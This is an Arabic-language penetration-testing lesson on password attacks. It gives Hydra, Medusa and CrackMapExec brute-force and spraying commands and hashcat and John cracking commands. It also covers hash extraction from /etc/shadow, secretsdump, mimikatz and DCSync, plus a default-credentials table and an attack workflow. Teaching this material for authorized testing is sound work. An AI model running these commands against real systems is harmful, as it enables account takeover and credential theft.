تحليل الثغرات والاستغلال
هجمات كلمات المرور
4 دقيقة للقراءة
هجمات كلمات المرور تبقى من أكثر الطرق فعالية للحصول على الوصول. يغطي هذا الدرس تقنيات كسر كلمات المرور عبر الإنترنت وبدون اتصال.
هجمات كلمات المرور عبر الإنترنت
الهجمات عبر الإنترنت تستهدف الخدمات الحية. استخدمها بحذر لتجنب قفل الحسابات.
Hydra (متعدد البروتوكولات)
القوة الغاشمة لـ SSH:
hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10
FTP:
hydra -L users.txt -P passwords.txt ftp://10.10.10.10
تسجيل دخول HTTP POST:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
SMB:
hydra -L users.txt -P passwords.txt smb://10.10.10.10
خيارات Hydra
| العلم | الغرض |
|---|---|
-l |
اسم مستخدم واحد |
-L |
قائمة أسماء مستخدمين |
-p |
كلمة مرور واحدة |
-P |
قائمة كلمات مرور |
-t |
الخيوط (افتراضي 16) |
-f |
التوقف بعد أول مطابقة |
-v |
إخراج تفصيلي |
CrackMapExec (Windows/AD)
# رش كلمة مرور SMB
crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt
# WinRM
crackmapexec winrm 10.10.10.10 -u user -p password
# فحص المسؤول المحلي
crackmapexec smb 10.10.10.10 -u user -p password --local-auth
Medusa
# هجوم SSH
medusa -h 10.10.10.10 -u admin -P passwords.txt -M ssh
# HTTP
medusa -h 10.10.10.10 -u admin -P passwords.txt -M http -m DIR:/admin
كسر كلمات المرور بدون اتصال
الهجمات بدون اتصال تعمل على الهاشات الملتقطة بدون تفاعل شبكي.
تحديد الهاش
# باستخدام hashid
hashid 'hash_here'
# باستخدام hash-identifier
hash-identifier
# أنماط الهاش الشائعة
MD5: 32 حرف سداسي عشري
SHA1: 40 حرف سداسي عشري
SHA256: 64 حرف سداسي عشري
NTLM: 32 حرف سداسي عشري (Windows)
bcrypt: بادئة $2a$، $2b$، $2y$
Hashcat (بقوة GPU)
الاستخدام الأساسي:
hashcat -m <mode> hash.txt wordlist.txt
الأوضاع الشائعة:
| الوضع | نوع الهاش |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1400 | SHA256 |
| 1000 | NTLM |
| 3200 | bcrypt |
| 1800 | sha512crypt ($6$) |
| 500 | md5crypt ($1$) |
| 13100 | Kerberoast |
| 18200 | AS-REP Roast |
كسر NTLM:
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
مع القواعد:
hashcat -m 1000 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule
John the Ripper
الاستخدام الأساسي:
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
تحديد الصيغة:
john --format=raw-md5 --wordlist=rockyou.txt hashes.txt
john --format=nt --wordlist=rockyou.txt ntlm_hashes.txt
إظهار المكسورة:
john --show hashes.txt
استخراج الهاشات
هاشات كلمات مرور Linux
# الهاشات مخزنة في /etc/shadow
# الصيغة: user:$id$salt$hash:...
# Unshadow لـ John
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john unshadowed.txt
هاشات كلمات مرور Windows
من قاعدة بيانات SAM (محلي):
# مع Impacket (إذا كان لديك وصول مسؤول)
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
# باستخدام mimikatz على الهدف
mimikatz# sekurlsa::logonpasswords
من وحدة تحكم النطاق:
# هجوم DCSync
impacket-secretsdump domain.local/admin:password@10.10.10.10
هجمات رش كلمة المرور
رش كلمة مرور واحدة على العديد من المستخدمين لتجنب القفل:
# باستخدام CrackMapExec
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123!' --continue-on-success
# باستخدام Kerbrute (Kerberos)
kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt 'Password123!'
قوائم الكلمات
قوائم كلمات Kali المدمجة
/usr/share/wordlists/
├── rockyou.txt # الأكثر شيوعاً
├── dirb/common.txt # دلائل الويب
├── dirbuster/ # المزيد من قوائم كلمات الويب
└── seclists/ # مجموعة شاملة
قوائم كلمات مخصصة
باستخدام cewl:
# توليد قائمة كلمات من موقع
cewl http://10.10.10.10 -w custom_wordlist.txt
# مع العمق والحد الأدنى لطول الكلمة
cewl http://10.10.10.10 -d 2 -m 5 -w custom.txt
باستخدام crunch:
# توليد جميع التركيبات من 4 أحرف
crunch 4 4 abcdefghijklmnopqrstuvwxyz -o wordlist.txt
# مع نمط
crunch 8 8 -t Pass@@%% -o wordlist.txt
# @ = حروف صغيرة، , = حروف كبيرة، % = رقم، ^ = رمز
بيانات الاعتماد الافتراضية الشائعة
جرب هذه دائماً قبل القوة الغاشمة:
| الخدمة | اسم المستخدم | كلمة المرور |
|---|---|---|
| SSH | root، admin | root، admin، password |
| MySQL | root | (فارغ)، root، mysql |
| PostgreSQL | postgres | postgres |
| Tomcat | tomcat، admin | tomcat، admin، s3cret |
| Jenkins | admin | admin |
| phpMyAdmin | root | (فارغ) |
| WordPress | admin | admin |
سير عمل هجوم كلمة المرور
1. استطلاع المستخدمين
└── SMTP، RID cycling، استطلاع الويب
2. تجربة بيانات الاعتماد الافتراضية
└── فحص وثائق الخدمة
3. رش كلمة المرور (إذا كان هناك العديد من المستخدمين)
└── كلمات مرور شائعة: Password1، Welcome1
4. القوة الغاشمة المستهدفة (إذا كان هناك قليل من المستخدمين)
└── hydra مع rockyou.txt
5. الكسر بدون اتصال (إذا تم الحصول على هاشات)
└── hashcat مع القواعد
مع إتقان تقنيات الاستغلال، سننتقل لهجمات تطبيقات الويب في الوحدة التالية. :::